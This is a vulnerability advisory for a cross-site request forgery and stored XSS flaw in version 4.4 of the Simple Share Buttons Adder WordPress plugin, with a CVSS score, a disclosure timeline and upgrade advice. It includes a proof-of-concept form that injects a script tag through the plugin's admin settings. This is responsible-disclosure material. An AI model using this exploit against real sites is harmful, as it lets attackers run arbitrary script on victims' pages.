CSRF and stored XSS in Simple Share Buttons Adder 4.4 allows attackers to execute javascript


Last revised:

An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary javascript in the context of the Homepage, Pages, Posts, Category/Archive pages and post Excerpts.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 6.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality Partial
Integrity Partial
Availability Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

If a logged-in administrator user clicks the submit button on this form, a javascript alert will display on the homepage. (In a real attack the form can be made to auto-submit using Javascript).

<form action="http://scone.local:8000/wp-admin/options-general.php?page=simple-share-buttons-adder" method="POST">
    <input type="hidden" name="ssba_options" value="save">
    <input type="checkbox" name="ssba_homepage" value="Y">
    <input type="text" name="ssba_text_placement" value= "below">
    <input type="text" name="ssba_before_or_after" value= "after">
    <input type="text" name="ssba_share_text" value="<script>alert('foo')</script>">
    <input type="submit">

Advisory timeline

  • 2014-06-19: Discovered
  • 2014-06-25: Reported to and author via email
  • 2014-06-26: Author reports issue fixed in version 4.5


Mitigation/further actions

Immediately upgrade to version 4.5 or greater.